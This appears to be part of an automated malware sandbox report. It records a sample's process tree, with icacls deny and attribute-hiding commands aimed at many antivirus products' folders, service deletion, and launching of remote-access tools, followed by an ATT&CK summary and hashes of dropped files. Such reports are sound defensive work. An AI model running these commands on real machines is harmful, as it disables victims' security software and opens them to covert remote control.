C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Norton" /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\Norton" /deny Администраторы:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Programdata\Kaspersky Lab" /deny Администраторы:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny Администраторы:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Kaspersky Lab" /deny Администраторы:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Kaspersky Lab" /deny Администраторы:(OI)(CI)(F)5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Doctor Web" /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\Doctor Web" /deny Администраторы:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\grizzly" /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\grizzly" /deny Администраторы:(OI)(CI)(F)5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Cezurity" /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Cezurity" /deny Администраторы:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Cezurity" /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Cezurity" /deny Администраторы:(OI)(CI)(F)5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\McAfee" /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\McAfee" /deny Администраторы:(OI)(CI)(F)5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Avira" /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\Avira" /deny Администраторы:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny Администраторы:(OI)(CI)(F)5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\ESET" /deny Администраторы:(OI)(CI)(F)5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\ESET" /deny Администраторы:(OI)(CI)(F)5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Panda Security" /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Panda Security" /deny Администраторы:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\programdata\microsoft\temp\H.bat4⤵
- Drops file in Drivers directory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\programdata\microsoft\temp\Temp.bat4⤵
-
C:\Windows\SysWOW64\timeout.exeTIMEOUT /T 5 /NOBREAK5⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\timeout.exeTIMEOUT /T 3 /NOBREAK5⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM 1.exe /T /F5⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM P.exe /T /F5⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S C:\Programdata\Windows5⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Intel\BLOCK.bat4⤵
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM iediagcmd.exe /T /F5⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\windows\speechstracing" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\windows\speechstracing" /deny system:(OI)(CI)(F)5⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "c:\program files\Internet Explorer\bin" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\icacls.exeicacls "c:\program files\Internet Explorer\bin" /deny System:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\Program Files\360\Total Security"5⤵
- Drops file in Program Files directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\360\Total Security" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)5⤵
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S C:\ProgramData\360TotalSecurity5⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S C:\ProgramData\360safe5⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\360TotalSecurity" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\360safe" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S C:\ProgramData\Avira5⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\Avira" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\ProgramData\Package Cache"5⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\Package Cache" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\Program Files\ESET"5⤵
- Drops file in Program Files directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\ESET" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)5⤵
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S C:\ProgramData\ESET5⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\ESET" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\Program Files\AVAST Software\Avast"5⤵
- Drops file in Program Files directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\AVAST Software\Avast" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)5⤵
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\Programdata\AVAST Software"5⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Programdata\AVAST Software" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)5⤵
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\Programdata\Kaspersky Lab"5⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\Programdata\Kaspersky Lab Setup Files"5⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Programdata\Kaspersky Lab" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)5⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Programdata\Kaspersky Lab Setup Files" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)5⤵
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\AdwCleaner"5⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\AdwCleaner" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\Program Files\Malwarebytes\Anti-Malware"5⤵
- Drops file in Program Files directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Malwarebytes\Anti-Malware" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "c:\programdata\Malwarebytes"5⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\icacls.exeicacls "c:\programdata\Malwarebytes" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\Programdata\MB3Install"5⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Programdata\MB3Install" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)5⤵
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\KVRT_Data"5⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\KVRT_Data" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)5⤵
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\ProgramData\Norton"5⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\Norton" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)5⤵
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\ProgramData\Avg"5⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\Avg" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\ProgramData\grizzly"5⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\grizzly" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\ProgramData\Doctor Web"5⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\Doctor Web" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\ProgramData\Indus"5⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\Indus" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)5⤵
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\WINDOWS\McMwt"5⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\WINDOWS\McMwt" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)5⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\WINDOWS\McMwt" /deny System:(OI)(CI)(F)5⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\lsass2.exe" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\lsass2.exe" /deny System:(OI)(CI)(F)5⤵
-
C:\Windows\SysWOW64\timeout.exetimeout 15⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\lsass.exe" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\lsass.exe" /deny System:(OI)(CI)(F)5⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\windows\boy.exe" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\windows\boy.exe" /deny System:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\ProgramData\Microsoft\Intel"5⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\ProgramData\Microsoft\Check"5⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\ProgramData\Microsoft\Temp"5⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete swprv2⤵
-
C:\Windows\SysWOW64\sc.exesc delete swprv3⤵
-
C:\ProgramData\Windows\rutserv.exeC:\ProgramData\Windows\rutserv.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\ProgramData\Windows\rfusclient.exeC:\ProgramData\Windows\rfusclient.exe /tray2⤵
- Executes dropped EXE
-
C:\ProgramData\Windows\rfusclient.exeC:\ProgramData\Windows\rfusclient.exe2⤵
- Executes dropped EXE
-
C:\ProgramData\Windows\rfusclient.exeC:\ProgramData\Windows\rfusclient.exe /tray3⤵
- Executes dropped EXE
- Suspicious behavior: SetClipboardViewer
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s TermService1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -s TermService1⤵
- Loads dropped DLL
Network
MITRE ATT&CK Matrix ATT&CK v6
Persistence
Modify Existing Service
3Hidden Files and Directories
3Account Manipulation
1Registry Run Keys / Startup Folder
2Winlogon Helper DLL
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Program Files\Common Files\System\iediagcmd.exe
-
C:\Program Files\Common Files\System\iexplore.exe
-
C:\ProgramData\Microsoft\Intel\BLOCK.bat
-
C:\ProgramData\Microsoft\Intel\R8.exe
-
C:\ProgramData\Microsoft\Intel\taskhost.exe
-
C:\ProgramData\Microsoft\Intel\taskhost.exe
-
C:\ProgramData\Microsoft\Intel\wini.exe
-
C:\ProgramData\Microsoft\Intel\wini.exe
-
C:\ProgramData\RealtekHD\taskhostw.exe
-
C:\ProgramData\WindowsTask\winlogon.exeMD5
ec0f9398d8017767f86a4d0e74225506
SHA1720561ad8dd165b8d8ad5cbff573e8ffd7bfbf36
SHA256870ff02d42814457290c354229b78232458f282eb2ac999b90c7fcea98d16375
SHA512d2c94614f3db039cbf3cb6ffa51a84d9d32d58cccabed34bf3c8927851d40ec3fc8d18641c2a23d6a5839bba264234b5fa4e9c5cb17d3205f6af6592da9b2484
-
C:\ProgramData\Windows\install.vbs
-
C:\ProgramData\Windows\reg1.reg
-
C:\ProgramData\Windows\reg2.reg
-
C:\ProgramData\Windows\rfusclient.exeMD5
b8667a1e84567fcf7821bcefb6a444af
SHA19c1f91fe77ad357c8f81205d65c9067a270d61f0
SHA256dc9d875e659421a51addd8e8a362c926369e84320ab0c5d8bbb1e4d12d372fc9
SHA512ec6af663a3b41719d684f04504746f91196105ef6f8baa013b4bd02df6684eca49049d5517691f8e3a4ba6351fe35545a27f728b1d29d949e950d574a012f852
-
C:\ProgramData\Windows\rfusclient.exeMD5
b8667a1e84567fcf7821bcefb6a444af
SHA19c1f91fe77ad357c8f81205d65c9067a270d61f0
SHA256dc9d875e659421a51addd8e8a362c926369e84320ab0c5d8bbb1e4d12d372fc9
SHA512ec6af663a3b41719d684f04504746f91196105ef6f8baa013b4bd02df6684eca49049d5517691f8e3a4ba6351fe35545a27f728b1d29d949e950d574a012f852
-
C:\ProgramData\Windows\rfusclient.exeMD5
b8667a1e84567fcf7821bcefb6a444af
SHA19c1f91fe77ad357c8f81205d65c9067a270d61f0
SHA256dc9d875e659421a51addd8e8a362c926369e84320ab0c5d8bbb1e4d12d372fc9
SHA512ec6af663a3b41719d684f04504746f91196105ef6f8baa013b4bd02df6684eca49049d5517691f8e3a4ba6351fe35545a27f728b1d29d949e950d574a012f852
-
C:\ProgramData\Windows\rfusclient.exeMD5
b8667a1e84567fcf7821bcefb6a444af
SHA19c1f91fe77ad357c8f81205d65c9067a270d61f0
SHA256dc9d875e659421a51addd8e8a362c926369e84320ab0c5d8bbb1e4d12d372fc9
SHA512ec6af663a3b41719d684f04504746f91196105ef6f8baa013b4bd02df6684eca49049d5517691f8e3a4ba6351fe35545a27f728b1d29d949e950d574a012f852
-
C:\ProgramData\Windows\rutserv.exeMD5
37a8802017a212bb7f5255abc7857969
SHA1cb10c0d343c54538d12db8ed664d0a1fa35b6109
SHA2561699b9b4fc1724f9b0918b57ca58c453829a3935efd89bd4e9fa66b5e9f2b8a6
SHA5124e20141da8ea4499daf8be5cc41b664dc4229e9575765caf6dc5873d8d0a09f9e200988e1404e767d0415005876a4cf38d5737bd3e1b2c12c4a8fb28adb4f0a0
-
C:\ProgramData\Windows\rutserv.exeMD5
37a8802017a212bb7f5255abc7857969
SHA1cb10c0d343c54538d12db8ed664d0a1fa35b6109
SHA2561699b9b4fc1724f9b0918b57ca58c453829a3935efd89bd4e9fa66b5e9f2b8a6
SHA5124e20141da8ea4499daf8be5cc41b664dc4229e9575765caf6dc5873d8d0a09f9e200988e1404e767d0415005876a4cf38d5737bd3e1b2c12c4a8fb28adb4f0a0
-
C:\ProgramData\Windows\rutserv.exeMD5
37a8802017a212bb7f5255abc7857969
SHA1cb10c0d343c54538d12db8ed664d0a1fa35b6109
SHA2561699b9b4fc1724f9b0918b57ca58c453829a3935efd89bd4e9fa66b5e9f2b8a6
SHA5124e20141da8ea4499daf8be5cc41b664dc4229e9575765caf6dc5873d8d0a09f9e200988e1404e767d0415005876a4cf38d5737bd3e1b2c12c4a8fb28adb4f0a0
-
C:\ProgramData\Windows\rutserv.exeMD5
37a8802017a212bb7f5255abc7857969
SHA1cb10c0d343c54538d12db8ed664d0a1fa35b6109
SHA2561699b9b4fc1724f9b0918b57ca58c453829a3935efd89bd4e9fa66b5e9f2b8a6
SHA5124e20141da8ea4499daf8be5cc41b664dc4229e9575765caf6dc5873d8d0a09f9e200988e1404e767d0415005876a4cf38d5737bd3e1b2c12c4a8fb28adb4f0a0
-
C:\ProgramData\Windows\rutserv.exeMD5
37a8802017a212bb7f5255abc7857969
SHA1cb10c0d343c54538d12db8ed664d0a1fa35b6109
SHA2561699b9b4fc1724f9b0918b57ca58c453829a3935efd89bd4e9fa66b5e9f2b8a6
SHA5124e20141da8ea4499daf8be5cc41b664dc4229e9575765caf6dc5873d8d0a09f9e200988e1404e767d0415005876a4cf38d5737bd3e1b2c12c4a8fb28adb4f0a0
-
C:\ProgramData\Windows\vp8decoder.dllMD5
88318158527985702f61d169434a4940
SHA13cc751ba256b5727eb0713aad6f554ff1e7bca57
SHA2564c04d7968a9fe9d9258968d3a722263334bbf5f8af972f206a71f17fa293aa74
SHA5125d88562b6c6d2a5b14390512712819238cd838914f7c48a27f017827cb9b825c24ff05a30333427acec93cd836e8f04158b86d17e6ac3dd62c55b2e2ff4e2aff
-
C:\ProgramData\Windows\vp8encoder.dllMD5
6298c0af3d1d563834a218a9cc9f54bd
SHA10185cd591e454ed072e5a5077b25c612f6849dc9
SHA25681af82019d9f45a697a8ca1788f2c5c0205af9892efd94879dedf4bc06db4172
SHA512389d89053689537cdb582c0e8a7951a84549f0c36484db4346c31bdbe7cb93141f6a354069eb13e550297dc8ec35cd6899746e0c16abc876a0fe542cc450fffe
-
C:\ProgramData\Windows\winit.exe
-
C:\ProgramData\Windows\winit.exe
-
C:\ProgramData\install\cheat.exe
-
C:\ProgramData\install\sys.exe
-
C:\ProgramData\install\sys.exeMD5
bfa81a720e99d6238bc6327ab68956d9
SHA1c7039fadffccb79534a1bf547a73500298a36fa0
SHA256222a8bb1b3946ff0569722f2aa2af728238778b877cebbda9f0b10703fc9d09f
SHA5125ba1fab68a647e0a0b03d8fba5ab92f4bdec28fb9c1657e1832cfd54ee7b5087ce181b1eefce0c14b603576c326b6be091c41fc207b0068b9032502040d18bab
-
C:\Programdata\Install\del.bat
-
C:\Programdata\RealtekHD\taskhostw.exe
-
C:\Programdata\WindowsTask\winlogon.exeMD5
ec0f9398d8017767f86a4d0e74225506
SHA1720561ad8dd165b8d8ad5cbff573e8ffd7bfbf36
SHA256870ff02d42814457290c354229b78232458f282eb2ac999b90c7fcea98d16375
SHA512d2c94614f3db039cbf3cb6ffa51a84d9d32d58cccabed34bf3c8927851d40ec3fc8d18641c2a23d6a5839bba264234b5fa4e9c5cb17d3205f6af6592da9b2484
-
C:\Programdata\Windows\install.bat
-
C:\Programdata\kz.exe
-
C:\Programdata\lsass.exe
-
C:\Programdata\lsass2.exe
-
C:\Programdata\olly.exe
-
C:\Programdata\script.exe
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\EDC238BFF48A31D55A97E1E93892934B_C20E0DA2D0F89FE526E1490F4A2EE5AB
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\EDC238BFF48A31D55A97E1E93892934B_C20E0DA2D0F89FE526E1490F4A2EE5AB
-
C:\Windows\SysWOW64\drivers\conhost.exe
-
C:\Windows\boy.exe
-
C:\Windows\java.exe
-
C:\programdata\install\cheat.exe
-
C:\programdata\microsoft\intel\R8.exe
-
C:\programdata\microsoft\temp\H.bat
-
C:\programdata\microsoft\temp\Temp.bat
-
C:\rdp\RDPWInst.exe
-
C:\rdp\RDPWInst.exe
-
C:\rdp\RDPWInst.exe
-
C:\rdp\Rar.exe
-
C:\rdp\Rar.exe
-
C:\rdp\bat.bat
-
C:\rdp\db.rar
-
C:\rdp\install.vbs
-
C:\rdp\pause.bat
-
C:\rdp\run.vbs
-
\??\PIPE\RManFUSCallbackNotify32
-
\??\PIPE\RManFUSCallbackNotify32
-
\??\c:\program files\rdp wrapper\rdpwrap.dll
-
\??\c:\program files\rdp wrapper\rdpwrap.ini
-
\??\c:\windows\svchost.exe
-
\Program Files\RDP Wrapper\rdpwrap.dll
-
\Users\Admin\AppData\Local\Temp\4210A729\mozglue.dll
-
\Users\Admin\AppData\Local\Temp\4210A729\msvcp140.dll
-
\Users\Admin\AppData\Local\Temp\4210A729\nss3.dll
-
\Users\Admin\AppData\Local\Temp\4210A729\vcruntime140.dll
-
\Users\Admin\AppData\Local\Temp\4210A729\vcruntime140.dll
-
\Users\Admin\AppData\Local\Temp\4210A729\vcruntime140.dll
-
memory/204-565-0x0000000000000000-mapping.dmp
-
memory/348-393-0x0000000000000000-mapping.dmp
-
memory/356-38-0x0000000000000000-mapping.dmp
-
memory/388-397-0x0000000000000000-mapping.dmp
-
memory/396-88-0x0000000000000000-mapping.dmp
-
memory/400-534-0x0000000000000000-mapping.dmp
-
memory/504-445-0x0000000000000000-mapping.dmp
-
memory/744-521-0x0000000000000000-mapping.dmp
-
memory/748-220-0x0000000000000000-mapping.dmp
-
memory/752-109-0x0000000000000000-mapping.dmp
-
memory/756-69-0x0000000000000000-mapping.dmp
-
memory/760-52-0x0000000000000000-mapping.dmp
-
memory/812-76-0x0000000000000000-mapping.dmp
-
memory/816-504-0x0000000000000000-mapping.dmp
-
memory/820-93-0x0000000000000000-mapping.dmp
-
memory/864-221-0x0000000000000000-mapping.dmp
-
memory/868-243-0x0000000000000000-mapping.dmp
-
memory/888-178-0x0000000000000000-mapping.dmp
-
memory/1004-111-0x0000000000000000-mapping.dmp
-
memory/1012-310-0x0000000000000000-mapping.dmp
-
memory/1028-64-0x0000000000000000-mapping.dmp
-
memory/1036-159-0x0000000000000000-mapping.dmp
-
memory/1120-528-0x0000000000000000-mapping.dmp
-
memory/1140-187-0x0000000000000000-mapping.dmp
-
memory/1164-551-0x0000000000000000-mapping.dmp
-
memory/1312-440-0x0000000000000000-mapping.dmp
-
memory/1372-114-0x0000000000000000-mapping.dmp
-
memory/1444-353-0x0000000000000000-mapping.dmp
-
memory/1456-509-0x0000000000000000-mapping.dmp
-
memory/1500-90-0x0000000000000000-mapping.dmp
-
memory/1504-531-0x0000000000000000-mapping.dmp
-
memory/1524-4-0x0000000000000000-mapping.dmp
-
memory/1528-22-0x0000000000000000-mapping.dmp
-
memory/1532-115-0x0000000000000000-mapping.dmp
-
memory/1544-62-0x0000000000000000-mapping.dmp
-
memory/1560-479-0x0000000000000000-mapping.dmp
-
memory/1596-405-0x0000000000000000-mapping.dmp
-
memory/1616-559-0x0000000000000000-mapping.dmp
-
memory/1624-266-0x0000000000000000-mapping.dmp
-
memory/1704-501-0x0000000000000000-mapping.dmp
-
memory/1816-562-0x0000000000000000-mapping.dmp
-
memory/1836-23-0x0000000000000000-mapping.dmp
-
memory/1872-103-0x0000000000000000-mapping.dmp
-
memory/1932-124-0x0000000000000000-mapping.dmp
-
memory/1968-77-0x0000000000000000-mapping.dmp
-
memory/2032-105-0x0000000000000000-mapping.dmp
-
memory/2036-106-0x0000000000000000-mapping.dmp
-
memory/2060-89-0x0000000000000000-mapping.dmp
-
memory/2100-441-0x0000000000000000-mapping.dmp
-
memory/2116-101-0x0000000000000000-mapping.dmp
-
memory/2132-399-0x0000000000000000-mapping.dmp
-
memory/2148-108-0x0000000000000000-mapping.dmp
-
memory/2164-57-0x0000000000000000-mapping.dmp
-
memory/2176-463-0x0000000000000000-mapping.dmp
-
